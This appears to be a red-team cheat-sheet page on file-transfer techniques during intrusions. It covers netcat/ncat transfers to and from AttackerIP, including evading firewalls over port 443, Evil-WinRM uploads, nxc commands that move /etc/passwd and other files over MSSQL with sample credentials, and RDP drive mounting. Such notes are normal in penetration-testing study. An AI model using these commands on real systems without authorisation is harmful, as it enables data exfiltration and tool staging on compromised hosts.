Skip to main content

Uncommon yet useful

Here we’ll explore some uncommon but useful methods for file transfer.

File Hash

Always verify the MD5 checksum of a file on both the target and attack hosts after transfer to ensure it wasn't corrupted or altered. It's a good habit for file integrity checks.

# Bash
md5sum filename

# PowerShell
Get-FileHash filename -Algorithm MD5

# Cmd
certutil -hashfile filename MD5

Transfer Techniques

Netcat/Ncat

info

If we need static binary, we can find some of them here: https://github.com/andrew-d/static-binaries

# Attacker -> Target
nc -nvlp 6969 > filename                     # Listen on Target Machine (Netcat)
ncat -nvlp 6969 --recv-only > filename       # Listen on Target Machine (Ncat)

nc -q 0 TargetIP 6969 < filename             # Send from Attacker (Netcat)
ncat --send-only TargetIP 6969 < filename    # Send from Attacker (Ncat)

# Target -> Attacker (Reverse transfer)
nc -nvlp 6969 -q 0 < filename                # Listen on Attacker (Netcat)
ncat -nvlp 6969 --send-only < filename       # Listen on Attacker (Ncat)

nc AttackerIP 6969 > filename                # Receive on Target (Netcat)
ncat AttackerIP 6969 --recv-only > filename  # Receive on Target (Ncat)

# Note:
# If inbound connections are blocked by a firewall, reverse the flow:
# - Swap '<' and '>' in the commands
# - Use common outbound ports like 443

Evil-WinRM

Evil-WinRM has built-in methods to upload and download files.

Evil-WinRM is a tool that leverages WinRM but wraps it in a simple interface for red teamers. Its upload and download commands are part of the Evil-WinRM tool.

upload /path/to/local/file
download C:\path\to\target\file

CrackMapExec

# Attack Host -> Target Host 
nxc mssql 10.10.10.10 -u "sqlsvc" -p "Password123@" --local-auth --put-file /etc/passwd C:/Users/Public/passwd

# Target Host -> Attack Host
nxc mssql 10.10.10.10 -u "sqlsvc" -p "Password123@" --local-auth --get-file C:/Windows/System32/drivers/etc/hosts hosts

# - Other protocols also support the --get-file and --put-file options.
# - If we got admin permissions (Pwn3d!), we can upload and download files from the system.
# - It can also be used to upload and download to/from SMB shares.

xFreeRDP/RDesktop

If we have an RDP session using either xfreerdp or rdesktop, we can copy files from the attack host and paste them to the target host.

However, if we copy a file from the target and try to paste it to the attack host, it doesn’t work. To solve this, we can mount a local resource on the target RDP server.

# XFreeRDP
xfreerdp /v:'10.10.10.10' /d:'rezydev.local' /u:'rezydev' /p:'Coolpass123@' /drive:linux,/home/rezydev/transferfiledirectory

# RDesktop
rdesktop 10.10.10.10 -d rezydev.local -u rezydev -p 'Coolpass123@' -r disk:linux='/home/rezydev/transferfiledirectory'

# After this just visit to '\\tsclient\' and connect and perform file transfer operations